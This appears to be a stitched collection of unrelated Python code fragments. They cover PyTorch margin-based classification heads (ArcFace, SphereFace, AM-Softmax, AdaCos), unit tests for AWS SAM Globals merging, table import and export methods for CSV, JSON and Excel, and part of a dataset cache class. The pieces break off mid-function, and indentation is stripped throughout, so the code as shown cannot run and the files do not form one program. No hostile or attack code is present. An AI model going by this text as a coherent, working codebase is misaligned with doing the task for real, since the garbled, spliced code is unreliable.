def forward_nodrop(self, input, label=None):
W = self.fc.weight
b = self.fc.bias
logits = F.linear(input, W, b)
return logits
def forward_drop(self, input, label=None):
W = self.fc.weight[self.rem_classes]
b = self.fc.bias[self.rem_classes]
logits = F.linear(input, W, b)
return logits
class L2SoftMax(DropClassBase):
def __init__(self, num_features, num_classes):
super(L2SoftMax, self).__init__(num_classes)
self.W = nn.Parameter(torch.FloatTensor(num_classes, num_features))
self.reset_parameters()
def reset_parameters(self):
nn.init.xavier_uniform_(self.W)
def forward_nodrop(self, input, label=None):
x = F.normalize(input)
W = F.normalize(self.W)
logits = F.linear(x, W)
return logits
def forward_drop(self, input, label=None):
x = F.normalize(input)
W = F.normalize(self.W[self.rem_classes])
logits = F.linear(x, W)
return logits
class SoftMax(DropClassBase):
def __init__(self, num_features, num_classes):
super(SoftMax, self).__init__(num_classes)
self.W = nn.Parameter(torch.FloatTensor(num_classes, num_features))
self.reset_parameters()
def reset_parameters(self):
nn.init.xavier_uniform_(self.W)
def forward_nodrop(self, input, label=None):
x = input
W = self.W
logits = F.linear(x, W)
return logits
def forward_drop(self, input, label=None):
x = input
W = self.W[self.rem_classes]
logits = F.linear(x, W)
return logits
class XVecHead(DropClassBase):
def __init__(self, num_features, num_classes, hidden_features=None):
super(XVecHead, self).__init__(num_classes)
hidden_features = num_features if not hidden_features else hidden_features
self.fc_hidden = nn.Linear(num_features, hidden_features)
self.nl = nn.LeakyReLU()
self.bn = nn.BatchNorm1d(hidden_features)
self.fc = nn.Linear(hidden_features, num_classes)
self.reset_parameters()
def reset_parameters(self):
self.fc.reset_parameters()
def forward_nodrop(self, input, label=None):
input = self.fc_hidden(input)
input = self.nl(input)
input = self.bn(input)
W = self.fc.weight
b = self.fc.bias
logits = F.linear(input, W, b)
return logits
def forward_drop(self, input, label=None):
input = self.fc_hidden(input)
input = self.nl(input)
input = self.bn(input)
W = self.fc.weight[self.rem_classes]
b = self.fc.bias[self.rem_classes]
logits = F.linear(input, W, b)
return logits
class AMSMLoss(DropClassBase):
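    # Additive margin softmax (AM-Softmax / CosFace style) head: logits are cosines between
    # L2-normalised features and class weights; the target-class cosine is reduced by the
    # additive margin m and all logits are re-scaled by s before the softmax cross-entropy.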
def __init__(self, num_features, num_classes, s=30.0, m=0.4):
super(AMSMLoss, self).__init__(num_classes)
self.num_features = num_features
self.n_classes = num_classes
self.s = s
self.m = m
self.W = nn.Parameter(torch.FloatTensor(num_classes, num_features))
self.reset_parameters()
def reset_parameters(self):
nn.init.xavier_uniform_(self.W)
def forward_nodrop(self, input, label=None):
# normalize features
x = F.normalize(input)
# normalize weights
W = F.normalize(self.W)
# dot product
logits = F.linear(x, W)
if label is None:
return logits
# add margin
target_logits = logits - self.m
one_hot = torch.zeros_like(logits)
one_hot.scatter_(1, label.view(-1, 1).long(), 1)
output = logits * (1 - one_hot) + target_logits * one_hot
# feature re-scale
output *= self.s
return output
def forward_drop(self, input, label=None):
# normalize features
x = F.normalize(input)
# normalize weights
W = F.normalize(self.W[self.rem_classes])
# dot product
logits = F.linear(x, W)
if label is None:
return logits
# add margin
target_logits = logits - self.m
one_hot = torch.zeros_like(logits)
one_hot.scatter_(1, label.view(-1, 1).long(), 1)
output = logits * (1 - one_hot) + target_logits * one_hot
# feature re-scale
output *= self.s
return output
class SphereFace(DropClassBase):
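    # SphereFace style multiplicative angular margin: the target-class logit becomes
    # cos(m * theta) instead of cos(theta), with a fixed re-scaling factor s.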
def __init__(self, num_features, num_classes, s=30.0, m=1.35):
super(SphereFace, self).__init__(num_classes)
self.num_features = num_features
self.n_classes = num_classes
self.s = s
self.m = m
self.W = nn.Parameter(torch.FloatTensor(num_classes, num_features))
self.reset_parameters()
def reset_parameters(self):
nn.init.xavier_uniform_(self.W)
def forward_nodrop(self, input, label=None):
# normalize features
x = F.normalize(input)
# normalize weights
W = F.normalize(self.W)
# dot product
logits = F.linear(x, W)
if label is None:
return logits
# add margin
theta = torch.acos(torch.clamp(logits, -1.0 + 1e-7, 1.0 - 1e-7))
target_logits = torch.cos(self.m * theta)
one_hot = torch.zeros_like(logits)
one_hot.scatter_(1, label.view(-1, 1).long(), 1)
output = logits * (1 - one_hot) + target_logits * one_hot
# feature re-scale
output *= self.s
return output
def forward_drop(self, input, label=None):
# normalize features
x = F.normalize(input)
# normalize weights
W = F.normalize(self.W[self.rem_classes])
# dot product
logits = F.linear(x, W)
if label is None:
return logits
# add margin
theta = torch.acos(torch.clamp(logits, -1.0 + 1e-7, 1.0 - 1e-7))
target_logits = torch.cos(self.m * theta)
one_hot = torch.zeros_like(logits)
one_hot.scatter_(1, label.view(-1, 1).long(), 1)
output = logits * (1 - one_hot) + target_logits * one_hot
# feature re-scale
output *= self.s
return output
class ArcFace(DropClassBase):
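    # ArcFace style additive angular margin: the target-class logit becomes cos(theta + m),
    # i.e. the margin is added to the angle itself rather than subtracted from the cosine.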
def __init__(self, num_features, num_classes, s=30.0, m=0.50):
super(ArcFace, self).__init__(num_classes)
self.num_features = num_features
self.n_classes = num_classes
self.s = s
self.m = m
self.W = nn.Parameter(torch.FloatTensor(num_classes, num_features))
self.reset_parameters()
def reset_parameters(self):
nn.init.xavier_uniform_(self.W)
def forward_nodrop(self, input, label=None):
# normalize features
x = F.normalize(input)
# normalize weights
W = F.normalize(self.W)
# dot product
logits = F.linear(x, W)
if label is None:
return logits
# add margin
theta = torch.acos(torch.clamp(logits, -1.0 + 1e-7, 1.0 - 1e-7))
target_logits = torch.cos(theta + self.m)
one_hot = torch.zeros_like(logits)
one_hot.scatter_(1, label.view(-1, 1).long(), 1)
output = logits * (1 - one_hot) + target_logits * one_hot
# feature re-scale
output *= self.s
return output
def forward_drop(self, input, label=None):
# normalize features
x = F.normalize(input)
# normalize weights
W = F.normalize(self.W[self.rem_classes])
# dot product
logits = F.linear(x, W)
if label is None:
return logits
# add margin
theta = torch.acos(torch.clamp(logits, -1.0 + 1e-7, 1.0 - 1e-7))
target_logits = torch.cos(theta + self.m)
one_hot = torch.zeros_like(logits)
one_hot.scatter_(1, label.view(-1, 1).long(), 1)
output = logits * (1 - one_hot) + target_logits * one_hot
# feature re-scale
output *= self.s
return output
class AdaCos(DropClassBase):
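    # AdaCos: no explicit margin is applied; instead the scale s is adapted on the fly from the
    # median target angle and the average magnitude of the non-target logits in each batch.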
def __init__(self, num_features, num_classes, m=0.50):
super(AdaCos, self).__init__(num_classes)
self.num_features = num_features
self.n_classes = num_classes
self.s = math.sqrt(2) * math.log(num_classes - 1)
self.m = m
self.W = nn.Parameter(torch.FloatTensor(num_classes, num_features))
self.reset_parameters()
def reset_parameters(self):
nn.init.xavier_uniform_(self.W)
def forward_nodrop(self, input, label=None):
# normalize features
x = F.normalize(input)
# normalize weights
W = F.normalize(self.W)
# dot product
logits = F.linear(x, W)
if label is None:
return logits
# feature re-scale
theta = torch.acos(torch.clamp(logits, -1.0 + 1e-7, 1.0 - 1e-7))
one_hot = torch.zeros_like(logits)
one_hot.scatter_(1, label.view(-1, 1).long(), 1)
with torch.no_grad():
B_avg = torch.where(one_hot < 1, torch.exp(self.s * logits), torch.zeros_like(logits))
B_avg = torch.sum(B_avg) / input.size(0)
theta_med = torch.median(theta[one_hot == 1])
self.s = torch.log(B_avg) / torch.cos(torch.min(math.pi/4 * torch.ones_like(theta_med), theta_med))
output = self.s * logits
return output
def forward_drop(self, input, label=None):
# normalize features
x = F.normalize(input)
# normalize weights
W = F.normalize(self.W[self.rem_classes])
<filename>tests/plugins/globals/test_globals.py
from parameterized import parameterized
from unittest import TestCase
from mock import patch, Mock
from samtranslator.plugins.globals.globals import GlobalProperties, Globals, InvalidGlobalsSectionException
class GlobalPropertiesTestCases(object):
dict_with_single_level_should_be_merged = {
"global": {
"a": 1,
"b": 2
},
"local": {
"a": "foo",
"c": 3,
"d": 4
},
"expected_output": {
"a": "foo",
"b": 2,
"c": 3,
"d": 4
}
}
dict_keys_are_case_sensitive = {
"global": {
"banana": "is tasty"
},
"local": {
"BaNaNa": "is not tasty"
},
"expected_output": {
"banana": "is tasty",
"BaNaNa": "is not tasty"
}
}
dict_properties_with_different_types_must_be_overridden_str_and_dict = {
"global": {
"key": "foo"
},
"local": {
"key": {"a": "b"}
},
"expected_output": {
"key": {"a": "b"}
}
}
dict_properties_with_different_types_must_be_overridden_boolean_and_int = {
"global": {
"key": True
},
"local": {
"key": 1
},
"expected_output": {
"key": 1
}
}
dict_properties_with_different_types_must_be_overridden_dict_and_array = {
"global": {
"key": {"a": "b"}
},
"local": {
"key": ["a"]
},
"expected_output": {
"key": ["a"]
}
}
dict_with_empty_local_must_merge = {
"global": {
"a": "b"
},
"local": {},
"expected_output": {
"a": "b"
}
}
nested_dict_keys_should_be_merged = {
"global": {
"key1": {
"key2": {
"key3": {
"key4": "value"
}
}
}
},
"local": {
"key1": {
"key2": {
"key3": {
"key4": "local value"
},
},
}
},
"expected_output": {
"key1": {
"key2": {
"key3": {
"key4": "local value"
},
},
}
}
}
nested_dict_with_different_levels_should_be_merged = {
"global": {
"key1": {
"key2": {
"key3": "value3"
},
"globalOnlyKey": "global value"
}
},
"local": {
"key1": {
"key2": "foo",
"localOnlyKey": "local value"
}
},
"expected_output": {
"key1": {
# Key2 does not recurse any further
"key2": "foo",
"globalOnlyKey": "global value",
"localOnlyKey": "local value"
}
}
}
nested_dicts_with_non_overridden_keys_should_be_copied = {
"global": {
"key1": {
"key2": {
"key3": {
"key4": "value"
}
},
"globalOnly": {
"globalOnlyKey": "globalOnlyValue"
}
}
},
"local": {
"key1": {
"key2": {
"key3": {
"localkey4": "other value 4"
},
"localkey3": "other value 3"
},
"localkey2": "other value 2",
}
},
"expected_output": {
"key1": {
"key2": {
"key3": {
"key4": "value",
"localkey4": "other value 4"
},
"localkey3": "other value 3"
},
"localkey2": "other value 2",
"globalOnly": {
"globalOnlyKey": "globalOnlyValue"
}
}
}
}
arrays_with_mutually_exclusive_elements_must_be_concatenated = {
"global": [1, 2, 3],
"local": [11, 12, 13],
"expected_output": [
1,2,3,
11,12,13
]
}
arrays_with_duplicate_elements_must_be_concatenated = {
"global": ["a", "b", "c", "z"],
"local": ["a", "b", "x", "y", "z"],
"expected_output": [
"a", "b", "c", "z",
"a", "b", "x", "y", "z"
]
}
arrays_with_nested_dict_must_be_concatenated = {
"global": [{"a": 1}, {"b": 2}],
"local": [{"x": 1}, {"y": 2}],
"expected_output": [
{"a": 1}, {"b": 2},
{"x": 1}, {"y": 2}
]
}
arrays_with_mixed_element_types_must_be_concatenated = {
"global": [1, 2, "foo", True, {"x": "y"}, ["nested", "array"]],
"local": [False, 9, 8, "bar"],
"expected_output": [
1, 2, "foo", True, {"x": "y"}, ["nested", "array"],
False, 9, 8, "bar"
]
}
arrays_with_exactly_same_values_must_be_concatenated = {
"global": [{"a": 1}, {"b": 2}, "foo", 1, 2, True, False],
"local": [{"a": 1}, {"b": 2}, "foo", 1, 2, True, False],
"expected_output": [
{"a": 1}, {"b": 2}, "foo", 1, 2, True, False,
{"a": 1}, {"b": 2}, "foo", 1, 2, True, False
]
}
# Arrays are concatenated. Other keys in dictionary are merged
nested_dict_with_array_values_must_be_merged_and_concatenated = {
"global": {
"key": "global value",
"nested": {
"array_key": [1, 2, 3],
},
"globalOnlyKey": "global value"
},
"local": {
"key": "local value",
"nested": {
"array_key": [8, 9, 10],
},
"localOnlyKey": "local value"
},
"expected_output": {
"key": "local value",
"nested": {
"array_key": [
1, 2, 3,
8, 9, 10
],
},
"globalOnlyKey": "global value",
"localOnlyKey": "local value"
}
}
intrinsic_function_must_be_overridden = {
"global": {
"Ref": "foo"
},
"local": {
"Fn::Spooky": "bar"
},
"expected_output": {
"Fn::Spooky": "bar"
}
}
    dict_value_in_local_must_override_intrinsic_function_in_global = {
"global": {
"Ref": "foo"
},
"local": {
"a": "b"
},
"expected_output": {
"a": "b"
}
}
intrinsic_function_in_local_must_override_dict_value_in_global = {
"global": {
"a": "b"
},
"local": {
"Fn::Something": "value"
},
"expected_output": {
"Fn::Something": "value"
}
}
intrinsic_function_in_nested_dict_must_be_overridden = {
"global": {
"key1": {
"key2": {
"key3": {
"Ref": "foo"
},
"globalOnlyKey": "global value"
}
}
},
"local": {
"key1": {
"key2": {
"key3": {
"Fn::Something": "New value"
}
},
}
},
"expected_output": {
"key1": {
"key2": {
"key3": {
"Fn::Something": "New value"
},
"globalOnlyKey": "global value"
},
}
}
}
invalid_intrinsic_function_dict_must_be_merged = {
"global": {
# This is not an intrinsic function because the dict contains two keys
"Ref": "foo",
"key": "global value"
},
"local": {
"Fn::Something": "bar",
"other": "local value"
},
"expected_output": {
"Ref": "foo",
"key": "global value",
"Fn::Something": "bar",
"other": "local value"
}
}
intrinsic_function_in_local_must_override_invalid_intrinsic_in_global = {
"global": {
# This is not an intrinsic function because the dict contains two keys
"Ref": "foo",
"key": "global value"
},
"local": {
# This is an intrinsic function which essentially resolves to a primitive type.
# So local is primitive type whereas global is a dictionary. Prefer local
"Fn::Something": "bar"
},
"expected_output": {
"Fn::Something": "bar"
}
}
primitive_type_inputs_must_be_handled = {
"global": "input string",
"local": 123,
"expected_output": 123
}
mixed_type_inputs_must_be_handled = {
"global": {"a": "b"},
"local": [1, 2, 3],
"expected_output": [1, 2, 3]
}
class TestGlobalPropertiesMerge(TestCase):
    # Get all attributes of the test case object which are not built-in methods like __str__
@parameterized.expand([d for d in dir(GlobalPropertiesTestCases)
if not d.startswith("__")
])
def test_global_properties_merge(self, testcase):
configuration = getattr(GlobalPropertiesTestCases, testcase)
if not configuration:
raise Exception("Invalid configuration for test case " + testcase)
global_properties = GlobalProperties(configuration["global"])
actual = global_properties.merge(configuration["local"])
self.assertEquals(actual, configuration["expected_output"])
class TestGlobalsPropertiesEdgeCases(TestCase):
@patch.object(GlobalProperties, "_token_of")
def test_merge_with_objects_of_unsupported_token_type(self, token_of_mock):
token_of_mock.return_value = "some random type"
properties = GlobalProperties("global value")
with self.assertRaises(TypeError):
# Raise type error because token type is invalid
properties.merge("local value")
class TestGlobalsObject(TestCase):
def setUp(self):
self._originals = {
"resource_prefix": Globals._RESOURCE_PREFIX,
"supported_properties": Globals.supported_properties
}
Globals._RESOURCE_PREFIX = "prefix_"
Globals.supported_properties = {
"prefix_type1": ["prop1", "prop2"],
"prefix_type2": ["otherprop1", "otherprop2"],
}
self.template = {
"Globals": {
"type1": {
"prop1": "value1",
"prop2": "value2"
},
"type2": {
"otherprop1": "value1",
"otherprop2": "value2"
}
}
}
def tearDown(self):
Globals._RESOURCE_PREFIX = self._originals["resource_prefix"]
Globals.supported_properties = self._originals["supported_properties"]
def test_parse_should_parse_all_known_resource_types(self):
globals = Globals(self.template)
parsed_globals = globals._parse(self.template["Globals"])
self.assertTrue("prefix_type1" in parsed_globals)
self.assertEquals(self.template["Globals"]["type1"], parsed_globals["prefix_type1"].global_properties)
self.assertTrue("prefix_type2" in parsed_globals)
self.assertEquals(self.template["Globals"]["type2"], parsed_globals["prefix_type2"].global_properties)
def test_parse_should_error_if_globals_is_not_dict(self):
template = {
"Globals": "hello"
}
with self.assertRaises(InvalidGlobalsSectionException):
Globals(template)
def test_parse_should_error_if_globals_contains_unknown_types(self):
template = {
"Globals": {
"random_type": {
"key": "value"
},
"type1": {
"key": "value"
}
}
}
with self.assertRaises(InvalidGlobalsSectionException):
Globals(template)
def test_parse_should_error_if_globals_contains_unknown_properties_of_known_type(self):
template = {
"Globals": {
"type1": {
"unknown_property": "value"
}
}
}
with self.assertRaises(InvalidGlobalsSectionException):
Globals(template)
def test_parse_should_error_if_value_is_not_dictionary(self):
template = {
"Globals": {
"type1": "string value"
}
}
with self.assertRaises(InvalidGlobalsSectionException):
Globals(template)
def test_parse_should_not_error_if_value_is_empty(self):
template = {
"Globals": {
"type1": {} # empty value
}
}
globals = Globals(template)
parsed = globals._parse(template["Globals"])
self.assertTrue("prefix_type1" in parsed)
self.assertEquals({}, parsed["prefix_type1"].global_properties)
def test_init_without_globals_section_in_template(self):
template = {
"a": "b"
}
global_obj = Globals(template)
self.assertEquals({}, global_obj.template_globals)
def test_del_section_with_globals_section_in_template(self):
template = self.template
expected = {}
Globals.del_section(template)
self.assertEquals(expected, template)
def test_del_section_with_no_globals_section_in_template(self):
template = {
"a": "b"
}
expected = {
"a": "b"
}
Globals.del_section(template)
self.assertEquals(expected, template)
@patch.object(Globals, "_parse")
def test_merge_must_actually_do_merge(self, parse_mock):
type1_mock = Mock()
type2_mock = Mock()
parse_mock.return_value = {
"type1": type1_mock,
"type2": type2_mock,
}
local_properties = {"a": "b"}
expected = "some merged value"
type1_mock.merge.return_value = expected
# Try to merge for type1
globals = Globals(self.template)
result = globals.merge("type1", local_properties)
self.assertEquals(expected, result)
type1_mock.merge.assert_called_with(local_properties)
type2_mock.merge.assert_not_called()
@patch.object(Globals, "_parse")
def test_merge_must_skip_unsupported_types(self, parse_mock):
type1_mock = Mock()
parse_mock.return_value = {
"type1": type1_mock
}
local_properties = {"a": "b"}
expected = {"a": "b"}
globals = Globals(self.template)
# Since type is not available in the globals, nothing should happen
result = globals.merge("some random type", local_properties)
self.assertEquals(expected, result)
type1_mock.merge.assert_not_called()
@patch.object(Globals, "_parse")
def test_merge_must_skip_with_no_types(self, parse_mock):
parse_mock.return_value = {
}
local_properties = {"a": "b"}
expected = {"a": "b"}
globals = Globals(self.template)
# Since type is not available in the globals, nothing should happen
result = globals.merge("some random type", local_properties)
self.assertEquals(expected, result)
def test_merge_end_to_end_on_known_type1(self):
type = "prefix_type1"
properties = {
"prop1": "overridden value",
"a": "b",
"key": [1,2,3]
}
expected = {
"prop1": "overridden value",
"prop2": "value2", # inherited from global
"a": "b",
"key": [1,2,3]
}
globals = Globals(self.template)
result = globals.merge(type, properties)
self.assertEquals(expected, result)
def test_merge_end_to_end_on_known_type2(self):
type = "prefix_type2"
properties = {
"a": "b",
"key": [1,2,3]
}
expected = {
"otherprop1": "value1", # inherited from global
"otherprop2": "value2", # inherited from global
"a": "b",
"key": [1,2,3]
transform function, then the attribute will
be set to the given default value
@type transforms: dict (optional)
@param filters: dict of functions by attribute name; if given, each
newly-read record will be filtered before being added to the table, with each
filter function run using the corresponding attribute; if any filter function
returns False, the record is not added to the table. Useful when reading large
input files, to pre-screen only for data matching one or more filters
@type filters: dict (optional)
@param row_class: class to construct for each imported row when populating table (default=DataObject)
@type row_class: type
@param limit: number of records to import
@type limit: int (optional)
@param kwargs: additional arguments for the excel reader. Only available argument is "sheet" to select which
sheet to read (defaults to active sheet)
@type kwargs: named arguments (optional)
@param fieldnames: names for imported columns; used if there is no header line in the input file
@type fieldnames: list[str] or str
"""
kwargs["fieldnames"] = fieldnames.split() if isinstance(fieldnames, str) else fieldnames
return self._excel_import(
excel_source,
transforms=transforms,
filters=filters,
row_class=row_class,
limit=limit,
**kwargs,
)
def csv_export(
self,
csv_dest: _ImportExportDataContainer,
fieldnames: Iterable[str] = None,
encoding: str = "utf-8",
delimiter: str = ",",
**kwargs,
):
"""
Exports the contents of the table to a CSV-formatted file.
@param csv_dest: CSV file - if a string is given, the file with that name will be
opened, written, and closed; if a file object is given, then that object
will be written as-is, and left for the caller to be closed.
@type csv_dest: string or file
@param fieldnames: attribute names to be exported; can be given as a single
string with space-delimited names, or as a list of attribute names
@type fieldnames: list of strings
@param encoding: string (default="UTF-8"); if csv_dest is provided as a string
representing an output filename, an encoding argument can be provided
@type encoding: string
@param delimiter: string (default=",") - overridable delimiter for value separator
@type delimiter: string
@param kwargs: additional keyword args to pass through to csv.DictWriter
@type kwargs: named arguments (optional)
"""
writer_args = dict(
(k, v)
for k, v in kwargs.items()
if k
not in [
"encoding",
"csv_dest",
"fieldnames",
]
)
close_on_exit = False
if isinstance(csv_dest, Path):
csv_dest = str(csv_dest)
if isinstance(csv_dest, str):
csv_dest = open(csv_dest, "w", newline="", encoding=encoding)
close_on_exit = True
try:
if fieldnames is None:
fieldnames = self._attr_names()
if isinstance(fieldnames, str):
fieldnames = fieldnames.split()
csv_dest.write(delimiter.join(fieldnames) + NL)
csvout = csv.DictWriter(
csv_dest,
fieldnames,
extrasaction="ignore",
lineterminator=NL,
delimiter=delimiter,
**writer_args,
)
try:
csvout.writerows(_to_dict(o) for o in self.obs)
except UnableToExtractAttributeNamesError:
attr_fetch = operator.attrgetter(*fieldnames)
for o in self.obs:
csvout.writerow(ODict(zip(fieldnames, attr_fetch(o))))
finally:
if close_on_exit:
csv_dest.close()
def tsv_export(
self,
tsv_dest: _ImportExportDataContainer,
fieldnames: Iterable[str] = None,
encoding: str = "UTF-8",
**kwargs,
):
r"""
Similar to csv_export, with delimiter="\t"
"""
return self.csv_export(
tsv_dest, fieldnames=fieldnames, encoding=encoding, delimiter="\t", **kwargs
)
def json_import(
self,
source: _ImportExportDataContainer,
encoding: str = "UTF-8",
transforms: Dict = None,
row_class: type = None,
) -> "Table":
"""
Imports the contents of a JSON data file into this table.
@param source: JSON data file - if a string is given, the file with that name will be
opened, read, and closed; if a file object is given, then that object
will be read as-is, and left for the caller to be closed.
@type source: string or file
@param transforms: dict of functions by attribute name; if given, each
attribute will be transformed using the corresponding transform; if there is no
matching transform, the attribute will be read as a string (default); the
transform function can also be defined as a (function, default-value) tuple; if
there is an Exception raised by the transform function, then the attribute will
be set to the given default value
@type transforms: dict (optional)
@param row_class: class to construct for each imported row when populating table (default=DataObject)
@type row_class: type
"""
class _JsonFileReader:
def __init__(self, src):
self.source = src
def __iter__(self):
current = ""
for line in self.source:
if current:
current += " "
current += line
try:
yield json.loads(current)
current = ""
except Exception:
pass
if row_class is None:
row_class = default_row_class
return self._import(
source,
encoding,
transforms=transforms,
reader=_JsonFileReader,
row_class=row_class,
)
def json_export(
self,
dest: _ImportExportDataContainer,
fieldnames: Union[Iterable[str], str] = None,
encoding: str = "UTF-8",
):
"""
Exports the contents of the table to a JSON-formatted file.
@param dest: output file - if a string is given, the file with that name will be
opened, written, and closed; if a file object is given, then that object
will be written as-is, and left for the caller to be closed.
@type dest: string or file
@param fieldnames: attribute names to be exported; can be given as a single
string with space-delimited names, or as a list of attribute names
@type fieldnames: list of strings
@param encoding: string (default="UTF-8"); if csv_dest is provided as a string
representing an output filename, an encoding argument can be provided
@type encoding: string
"""
close_on_exit = False
if isinstance(dest, Path):
            dest = str(dest)
if isinstance(dest, str):
dest = open(dest, "w", encoding=encoding)
close_on_exit = True
try:
if isinstance(fieldnames, str):
fieldnames = fieldnames.split()
if fieldnames is None:
for o in self.obs:
dest.write(_to_json(o) + "\n")
else:
for o in self.obs:
dest.write(
json.dumps(ODict((f, getattr(o, f)) for f in fieldnames)) + "\n"
)
finally:
if close_on_exit:
dest.close()
def excel_export(
self,
excel_dest: _ImportExportDataContainer,
fieldnames: Iterable[str] = None,
**kwargs,
):
if openpyxl is None:
raise Exception("openpyxl module not installed")
if kwargs.pop('lxml', True) is False:
lxml = None
else:
try:
import lxml
except ImportError:
lxml = None
if lxml is not None:
wb = openpyxl.Workbook(write_only=True)
ws = wb.create_sheet()
else:
wb = openpyxl.Workbook()
ws = wb.active
# set header rows
if fieldnames is None:
fieldnames = self._attr_names()
elif isinstance(fieldnames, str):
fieldnames = fieldnames.split()
ws.append(fieldnames)
# append data
for o in self.obs:
ws.append([v for v in _to_dict(o).values()])
wb.save(excel_dest)
def add_field(
self, attrname: str, fn: Callable[[Any], Any], default: Any = None
) -> "Table":
"""
Computes a new attribute for each object in table, or replaces an
existing attribute in each record with a computed value
@param attrname: attribute to compute for each object
@type attrname: string
@param fn: function used to compute new attribute value, based on
other values in the object, as in::
lambda ob : ob.commission_pct/100.0 * ob.gross_sales
@type fn: function(obj) returns value
@param default: value to use if an exception is raised while trying
to evaluate fn
"""
try:
for rec_ in self:
try:
val = fn(rec_)
except Exception:
val = default
if isinstance(rec_, DataObject):
rec_.__dict__[attrname] = val
else:
setattr(rec_, attrname, val)
except AttributeError:
raise AttributeError(
f"cannot add/modify attribute {attrname!r} in table records"
)
return self
def groupby(self, keyexpr, **outexprs):
"""
simple prototype of group by, with support for expressions in the group-by clause
and outputs
        @param keyexpr: grouping field and optional expression for computing the key value;
            if a string is passed, it is treated as one or more space-delimited attribute names;
            if a tuple is passed, it must be (attribute-name, key-function)
@type keyexpr: string or tuple
@param outexprs: named arguments describing one or more summary values to
compute per key
@type outexprs: callable, taking a sequence of objects as input and returning
a single summary value
"""
if isinstance(keyexpr, str):
keyattrs = keyexpr.split()
keyfn = lambda o: tuple(getattr(o, k) for k in keyattrs)
elif isinstance(keyexpr, tuple):
keyattrs = (keyexpr[0],)
keyfn = keyexpr[1]
else:
raise TypeError("keyexpr must be string or tuple")
grouped_obs = defaultdict(list)
for ob in self.obs:
grouped_obs[keyfn(ob)].append(ob)
tbl = Table()
for k in keyattrs:
tbl.create_index(k, unique=(len(keyattrs) == 1))
for key, recs in sorted(grouped_obs.items()):
group_obj = default_row_class(**dict(zip(keyattrs, key)))
for subkey, expr in outexprs.items():
setattr(group_obj, subkey, expr(recs))
tbl.insert(group_obj)
return tbl
def splitby(self, pred: Union[str, PredicateFunction]) -> Tuple["Table", "Table"]:
"""
Takes a predicate function (takes a table record and returns True or False)
and returns two tables: a table with all the rows that returned False and
a table with all the rows that returned True. Will also accept a string
indicating a particular field name, and uses `bool(getattr(rec, field_name))`
        for the predicate function.
<filename>data/cache.py
import os
import pickle
from typing import Optional, Dict
import config as cf
import numpy as np
from data.datasets import Dataset
from data.preprocessor import Preprocessor
from utils import log
from utils.singleton import Singleton
class Cache(metaclass=Singleton):
"""This singleton class handles persisting and loading of user-defined data in order to reduce the need of
re-calculation.
"""
# this version will be added to each created cached file. if the version number stored in a loaded file is
# smaller than this, it will not be used
# -> increase it whenever old cache data is incompatible
_cache_version = 8
# the following keys will be used to access the cached data in a dictionary
# they will also be used as the name of the file they will be saved to
# Dataset keys
KEY_DATA_X = "x"
KEY_DATA_Y = "y"
KEY_CACHE_VERSION = "cache_version"
KEY_CONFIG = "config"
KEY_NEXT_NEW_IID = "next_new_iid"
KEY_LABEL_IDS = "label_ids"
KEY_LABEL_NAME_BY_ID = "label_name_by_id"
KEY_LABEL_ID_BY_NAME = "label_id_by_name"
KEY_PREPROCESSOR = "preprocessor"
# file list loader keys
CATEGORY_PREFIX_FILE_LIST_LOADER = "file_list_loader_"
KEY_FLL_IMG_INFOS_PER_DS = "image_infos_per_dataset"
KEY_FLL_IMG_INFOS = "image_infos"
KEY_FLL_IMG_INFOS_PER_IID = "image_infos_per_iid_label"
def __init__(self):
"""Create the singleton object."""
# ensure that the root cache path does exist
if not os.path.exists(self._ds_path("")):
os.makedirs(self._ds_path(""))
# inform the user about deprecated cache data
deprecated_cache_num = self._count_old_cache_version_folders()
if deprecated_cache_num > 0:
log.log("Found {} deprecated cache folders. Go ahead and delete them manually.".format(deprecated_cache_num))
def _ds_path(self, dataset_key: str, suffix=None, suffix_extension=".npy") -> str:
"""Get the file path to the specified dataset cache.
Note that datasets are cached in a slightly different structure than other objects.
:param dataset_key: The key identifying the dataset which should be cached.
:param suffix: An additional suffix which will be appended to the base file name.
:param suffix_extension: The file extension. Either ".npy" or ".p".
:return:
"""
# each version gets its own subdirectory
path = os.path.join(self._base_path("dataset"), "{}x{}".format(
cf.get("img_width"),
cf.get("img_height")
))
# each dataset, too
path = os.path.join(path, dataset_key)
# suffix is used for the actual file name + .npy
if suffix is not None:
path = os.path.join(path, suffix + suffix_extension)
return path
def _base_path(self, category, suffix=None, suffix_extension=".npy") -> str:
"""Get the file path to the given non-dataset cache element.
:param category: Cache elements are grouped in categories.
:param suffix: This suffix should describe the individual element of the associated category.
:param suffix_extension: The file extension. Either ".npy" or ".p".
:return:
"""
# each version gets its own subdirectory
path = os.path.join(cf.get("cache_path_root"), "v{}".format(
self._cache_version,
))
# each dataset, too
path = os.path.join(path, category)
# suffix is used for the actual file name + .npy
if suffix is not None:
path = os.path.join(path, suffix + suffix_extension)
return path
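# Illustrative on-disk layout produced by the two path helpers above (the
# 64x64 image size and the "oasis_train" key are made-up example values):
#
#   <cache_path_root>/v8/dataset/64x64/oasis_train/x.npy   <- _ds_path("oasis_train", "x")
#   <cache_path_root>/v8/dataset/64x64/oasis_train/preprocessor.p
#   <cache_path_root>/v8/file_list_loader_<suffix>/image_infos.npy  <- _base_path(category, "image_infos")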
def load_dataset(self, dataset_key: str) -> Optional[Dict]:
"""Return the requested dataset parts structured in a dictionary, or None if not available/valid.
:param dataset_key: The key identifying the dataset which should be loaded from cache.
:return:
"""
# if a cached file does exist
if os.path.isfile(self._ds_path(dataset_key, self.KEY_CACHE_VERSION)):
log.log("Found cached data")
log.log(".. loading cached dataset {}".format(dataset_key))
loaded_data = dict()
for file_name in os.listdir(self._ds_path(dataset_key)):
key = os.path.splitext(file_name)[0]
if file_name.endswith(".npy"):
loaded_data[key] = np.load(self._ds_path(dataset_key, key))
elif file_name.endswith(".p"):
with open(self._ds_path(dataset_key, key, ".p"), "rb") as input_file:
loaded_data[key] = pickle.load(input_file)
log.log(".. dataset has been loaded successfully from the cache")
# restore class attributes
# TODO do not use private vars, ensure that no conflict between different datasets can exist
log.log(".. loading global meta information about available labels")
Dataset._next_new_iid = loaded_data[self.KEY_NEXT_NEW_IID]
Dataset._label_internal_ids = loaded_data[self.KEY_LABEL_IDS]
Dataset._label_name_by_internal_id = loaded_data[self.KEY_LABEL_NAME_BY_ID]
Dataset._label_internal_id_by_name = loaded_data[self.KEY_LABEL_ID_BY_NAME]
return loaded_data
else:
log.log("Cache for dataset {} is empty".format(
dataset_key
))
return None
def load(self, category, data_keys=None) -> Optional[Dict]:
"""Return the requested non-dataset data from cache, or None if not available/valid.
:param category: The category which should be (partially) loaded.
:param data_keys: If None, all found files of that category will be loaded. Otherwise, only the specified ones.
:return:
